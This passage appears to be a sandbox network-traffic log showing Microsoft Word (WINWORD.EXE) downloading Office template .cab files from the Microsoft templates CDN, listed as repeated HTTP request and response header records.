    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20235
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
    Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
    ETag: 0x8D36AC4A3175138
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328908.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31083
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iamBjmZY1zpztkJSL/hwHw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC498DE687B
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: c5200cc9-a01e-00a1-5597-a0f6f2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328916.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 26944
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC49908AE11
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: b597306b-e01e-00c0-6697-a0b22d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 261258
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
    Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
    ETag: 0x8D60DDC968C4F0E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: bb8fd03d-a01e-0043-4797-a06c76000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328919.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22149
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC4992C63CE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f67f6439-f01e-00b9-7e97-a0db67000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2591108
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: vrEqBGTQlsozuupDUs6ADw==
    Last-Modified: Wed, 29 Aug 2018 18:18:42 GMT
    ETag: 0x8D60DDBD9E38C6B
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 657a3b26-501e-00bf-4a97-a02c1f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328925.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 25314
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC49952B1C0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7434c23b-501e-0073-4e97-a048aa000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03998159.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3417042
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
    Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
    ETag: 0x8D36AC8BD7E1FE9
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328932.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20554
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
    Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
    ETag: 0x8D36AC887A4CC19
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03998158.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 42788
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IaS3txYxwszaX7umN1Hw0g==
    Last-Modified: Fri, 22 Apr 2016 15:41:55 GMT
    ETag: 0x8D36AC4A24B210A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: da46b32d-701e-0081-5997-a09a3e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328935.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 23597
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC49996C1E0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328940.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21791
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499BA77A5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 579ed937-501e-0015-1e97-a0faf0000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328951.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19893
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
    Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
    ETag: 0x8D36AC8888436CF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8b7f2b9c-601e-00da-3797-a013cb000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328972.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21111
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
    ETag: 0x8D36AC888CEAFBE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d4301ed0-b01e-0122-0997-a0b138000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328975.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22594
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A2D135E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e960e28b-801e-0094-6497-a058a7000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328983.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21875
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
    ETag: 0x8D36AC88963C8B3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 719e0bb9-a01e-0053-5c97-a0a91e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328986.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22340
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A9463F7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 954c7b2e-e01e-0048-5b97-a00af4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328998.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21357
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: l/W3t+nhKBmZRopcQssS5w==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A7F05EE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328990.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19288
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A1DF716
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 295527
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
    Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
    ETag: 0x8D60DFAA9FC6013
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 9ae01919-001e-0028-0a97-a0eb82000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 276650
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
    Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
    ETag: 0x8D60DDB82865741
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
